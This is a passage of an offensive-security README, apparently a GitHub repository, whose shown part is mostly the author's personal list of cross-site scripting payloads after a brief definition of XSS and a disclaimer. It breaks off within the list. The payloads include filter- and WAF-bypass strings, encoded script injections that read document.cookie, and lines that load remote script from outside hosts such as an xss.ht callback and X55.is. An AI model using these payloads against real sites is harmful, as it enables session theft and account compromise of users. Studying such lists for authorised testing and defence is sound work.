├── README.md └── assets ├── api-example.jpg ├── deserialization-diagram.jpg ├── forbidden.png ├── sqli-example.png └── xss-example.png /README.md: -------------------------------------------------------------------------------- 1 |
2 |

Offensive Security Miscellaneous!


3 | 4 |
5 | 6 | # Topics:
7 | 8 | > [XSS Related + Payload list](#--xss) 9 | 10 | > [SQLi Related + Payload list](#--sqli) 11 | 12 | > [cURL Related](#--curl-related) 13 | 14 | > [403 Bypassing](#--bypass-403-forbidden) 15 | 16 | > [Tools Related](#--tools) 17 | 18 | > [APIs](#--apis) 19 | 20 |
21 |
22 | 23 | # - XSS 24 | ● What is cross-site scripting (XSS)?
25 | 26 | Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script (JavaScript, etc), to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. XSS can cause a variety of problems for the end user, that range in severity: from an annoyance, to complete account compromising. 27 | XSS attacks may be conducted without using `` html tags. Other html tags will do exactly the same thing, for example: `` or other html attributes such as: onmouseover, onerror, onload, etc... [(source)](https://owasp.org/www-community/attacks/xss/) 28 | 29 | XSS Attack example 30 | 31 |
32 | 33 | > Do not use the following xss payloads in a random or unauthorized web application, I do not take any resposibility
34 | > to anyone willing to execute or exploit them on random endpoints and parameters, you have been warned! 35 | 36 | ## XSS Payloads (My personal collection)
37 | 38 |
39 | 🔴 Click to view my personal custom list of XSS Payloads 40 | 41 | ``` 42 | --- Important Note --- 43 | --- Please do consider that these payloads are used not for fuzzing nor to be added to a wordlist, --- 44 | --- there are many payloads here that would need additional actions to properly work. --- 45 | --- But of course, if you do wish to add some of them to a wordlist, then there's no problem at all! --- 46 | --- I also add commentary about every/most of the payloads in the commit history -- 47 | 48 | -%26apos; 50 | ">exemplo 51 | "">%27/---+{{77}}" 52 | ;// 53 | ;// 54 | 62 | "> 63 | %22on%3eerror=%22prompt(document.domain) 64 | %27%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 65 | %3Cscript%3Ealert(document.domain);%3C/script%3E 66 | -->

xss/ 67 | "onmouseover=alert(1)// 68 | %3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E 69 | 'onerror=%22alert%60kauenavarro%60%22testabcd))/ 70 | %3cscript%3eprompt(document.domain)%3c%2fscript%3e 71 | javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain 72 | 1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.domain%29%3C/ScRiPt%3E 73 | '"()%26%25alert(document.domain) 74 | '();}]9676"> 75 | "%20">%3 76 | %22%3E%3C%2Fa%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28document.cookie%29%3B%3E%3C%2Fscript%3E 77 | %3Cmarquee%20loop%3d1%20width%3d0%20onfinish%3dco\u006efirm(document.cookie)%3EXSS%3C%2fmarquee%3E 78 | "> 79 | javascript:alert(document.domain) 80 | %22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3B%3E 81 | %22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28POCkauenavarroxss%29%3E 82 | ;'"/'/>alert(1) 84 | 103 | <--` --!> 104 | javascript:{alert`0`} 105 | sussy 107 | 108 |

dragme 109 | 110 | 111 | 112 | 3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{ 113 | 0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C 114 |
115 | "/>a 116 | clickme 118 | click 119 | hi 120 | 121 | anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz 122 | "/> 123 | .png 124 | ">.png 125 | ">.svg 126 | < 132 | \"> 143 | "> 161 | 162 | javascripT:eval('var a=document.createElement(\'script\'):a.src=\'https://ofjaaaah.xss.ht\':document.body.appendChild(a)') 163 | %3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[`al`+`ert`](1)%3E%23leet%3C/marquee%3E 164 | %3Cx%20y=1%20z=%271%26apos;%27onclick=self[`al`%2B`ert`](1)%3E%23CLICK%20MEE 165 | 0%3Bdata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgUE9DbCIpPC9zY3JpcHQ%22HTTP-EQUIV%3D%22refresh%22 166 | xss> 169 | >

170 | 171 | 172 | 174 | %E2%80%A8%E2%80%A9confirm(1) 175 | ;confirm(document.domain)// 176 | ;onerror=alert;throw%201 177 | 178 | 179 | 180 | 181 | 182 | 183 | test 184 | test 185 | test 186 | 187 | javascript:/*--> 188 | ');} 189 | ">Click 190 |
191 | click 192 | 193 |
194 | X 195 | ">laod=alert> 196 | 197 | 198 | javascript:new%20Function`al\ert\`1\``; 199 | 200 | 201 | 203 | JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/* 204 | \74k 205 | "> 206 | "> 207 | "> 208 | "> 209 | Supremo-XSS">XSS 210 | Supremo-XSS"> 212 | "()%26%25N8Zn(9266) 213 |
214 | '`"> 215 |

216 | %0d%0a 217 | %0d%0amouseOver

218 | %3Ca+href=//X55.is+autofocus+onfocus=import(href)%3E 219 | 220 | -20a")});a=alert;a(1);// 221 | valor%0aalert(1)%3C/script%3E 222 | 223 | "/> 224 | "%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F 225 | 226 |

APTH 227 | "%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F 228 | "> 229 | " onmouseenter=confirm(1)// 230 | '%20onmouseenter=confirm(1)// 231 | #alert(document.domain)// 232 | %22%27%22%3E%3CMETA%20HTTP-EQUIV%3Drefresh%20CONTENT%3D1%3E%3F%3D 233 |
Password:

<\!-- 234 |
235 | /(A('onerror=%22alert%601%60%22testabcd))/ 236 | /Orders/(A(%22onerror='alert%60xss%60'testabcd))/Login.aspx?ReturnUrl=/Orders 237 | (A(%22onerror='alert%601%60'testabcd))/Login.aspx?ReturnUrl=%2f 238 | "%20onmouseenter=confirm(document.domain)%20value=" 239 | '"onclick=(co\u006efirm)?.0>

240 | %22%3E%3CSvg/onload=confirm3// 241 | "> 242 | "><img src=x onerror=prompt(document.domain)> 243 | 244 | 245 | 246 | 248 | 250 | javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain 251 | %7B%7Bconstructor.constructor(%27confirm(document.domain)%27)()%7D%7D 252 | "> 253 | "document.body['innerHTML']=atob('PGltZyBzcmM9InRlc3RlLnBuZyIgb25lcnJvcj0iYWxlcnQod2luZG93Lm9yaWdpbikiPg==') 254 | %0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E 255 | %26%2302java%26%23115cript:alert(document.domain) 256 | ">Click%20me%0AXSS 257 | %3Cxss%20contenteditable%20onbeforeinput=alert(1)%3Etest 258 | %27%3E%0A%3C!--%3E%3Ca%20href=%22javascript:import(%27%2f%2fX55.is%27)%22%3ECLICK%3C/a%3E%0A%3C!--%3E 259 | %22bestxss=%3E%3Cxss%20contenteditable%20onbeforeinput=%22a='import(%60/%09/x55.is//%60)';b='javascript:';location=b%2Ba%22%3ESEARCHHERE%3C!--.html 260 |
265 |